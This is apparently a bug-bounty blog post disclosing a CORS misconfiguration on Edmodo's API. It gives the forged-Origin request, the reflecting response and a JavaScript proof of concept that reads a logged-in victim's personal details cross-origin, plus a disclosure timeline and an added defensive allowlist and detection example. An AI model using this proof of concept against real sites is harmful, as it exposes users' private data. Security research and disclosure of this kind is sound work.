I hope you read my previous post on "Mis-configured CORS Exploitation", so let's continue.
After updating some information on Edmodo, I found a URL that sends a GET request, along with an access token, in order to fetch the user's private information.
I therefore changed the Origin header to confirm whether the endpoint's CORS configuration was unsafe or not.
Request:
    GET /profiles/user_id?param1=&param2=&access_token=eyJ0eXAiOiJKV1QiLC..... HTTP/1.1
    Host: api.edmodo.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://www.edmodo.com/home
    Origin: https://www.attacker.com
    Connection: keep-alive
And the response was:
Response:
    HTTP/1.1 200 OK
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS, PATCH
    Access-Control-Allow-Origin: https://www.attacker.com
    Access-Control-Expose-Headers: Link, X-Total-Count
    Access-Control-Max-Age: 1728000
    Cache-Control: max-age=0, private, must-revalidate
    Content-Type: application/json; charset=utf-8
    Date: Tue, 08 Aug 2017 21:11:39 GMT
    ETag: W/"8907834cb797c5c5c71eb4073ec1234"
    Server: nginx
    Strict-Transport-Security: max-age=16070400; includeSubDomains
    Vary: Accept-Encoding, Origin
    X-RateLimit-Limit: 1000000
    X-RateLimit-Remaining: 999778
    X-Request-Id: ee8aa9fc-7473-4477-913c-1504a556564e
    X-Runtime: 0.203002
    Content-Length: 1315
    Connection: keep-alive

    [JSON Data : user credentials…]
So the CORS configuration was unsafe: the response reflected the attacker-controlled origin (ACAO: https://www.attacker.com) together with ACAC: true, meaning the browser would let that origin read the response made with the user's credentials.
I also noticed here that access tokens are valid for a long period of time (or never expire), and with the help of such an access token I was able to get the private data of other users.
(That was a separate issue, which we will discuss later in another blog post.)
So now we have our vulnerable endpoint: https://api.edmodo.com/profiles/user_id?param1=&param2=&access_token=eyJ0eXAiOiJKV1QiLC.....
After creating a CORS exploitation PoC, I uploaded it to my server.
    function cors() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        // The cross-origin response was readable: render it into the page
        if (this.readyState == 4 && this.status == 200) {
          document.getElementById("demo").innerHTML = this.responseText;
        }
      };
      xhttp.open("GET", "https://api.edmodo.com/profiles/user_id?param1=&param2=&access_token=eyJ0eXAiOiJKV1QiLC.....", true);
      xhttp.withCredentials = true; // default: false; must be set so the browser attaches the victim's cookies
      xhttp.send();
    }
Once a logged-in Edmodo user clicks the Exploit button, their personal information is disclosed: email address, secondary email address, home address, city, zip code, state, country, latitude, longitude, created date, role, about, etc.
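To make the defect concrete from the server side, here is an added example (not code from the post or from Edmodo) that places the weak, origin-reflecting policy described above next to an allowlist-based one, and a small check that flags a response whose ACAO echoes an arbitrary probe origin while ACAC is true. The header objects and the allowlist are assumptions for the demo.

```javascript
// Added example, not from the original post. Assumption: a handler returns
// the CORS response headers as a plain object keyed by header name.

// Origins that may read credentialed responses (assumed allowlist).
const ALLOWED_ORIGINS = new Set(["https://www.edmodo.com"]);

// Weak policy: echoes whatever Origin arrived and also allows credentials,
// which is exactly the ACAO/ACAC pair seen in the response above.
function weakCorsHeaders(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Hardened policy: exact-match against the allowlist. An unknown origin gets
// no ACAO header at all, so the browser refuses to expose the body to it.
function strictCorsHeaders(requestOrigin) {
  const headers = { "Vary": "Origin" };
  if (typeof requestOrigin === "string" && ALLOWED_ORIGINS.has(requestOrigin)) {
    headers["Access-Control-Allow-Origin"] = requestOrigin;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// Detection: would a page at probeOrigin be able to read a credentialed
// response? Only an exact echo of the origin plus ACAC "true" qualifies;
// browsers reject "*" when credentials are in play. Header names are
// case-insensitive, so they are normalised before lookup.
function isCredentialedOriginReflection(probeOrigin, headers) {
  const norm = {};
  for (const [name, value] of Object.entries(headers)) {
    norm[name.toLowerCase()] = String(value).trim();
  }
  const acao = norm["access-control-allow-origin"];
  const acac = norm["access-control-allow-credentials"];
  return acao === probeOrigin && acac !== undefined && acac.toLowerCase() === "true";
}

// Constructed sample: the relevant headers from the response quoted above.
const SAMPLE_RESPONSE_HEADERS = {
  "Access-Control-Allow-Credentials": "true",
  "Access-Control-Allow-Origin": "https://www.attacker.com",
  "Vary": "Accept-Encoding, Origin",
};
```

The same check returns false for the hardened handler, including for look-alike origins such as a subdomain of an attacker domain that merely starts with the allowed hostname.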
Aug 09, 2017 : Reported Date (CORS Exploitation)
Aug 11, 2017 : Report Triaged
Sep 24, 2017 : Reported Additional Info. Read here
Oct 12, 2017 : Bug Patched [CORS misconfiguration still present, but access to private information through it was restricted]
Happy Hunting…!!! 🔱
Next Post 🔰 : IDOR + JWT Token - Edmodo All Users Private Information Disclosure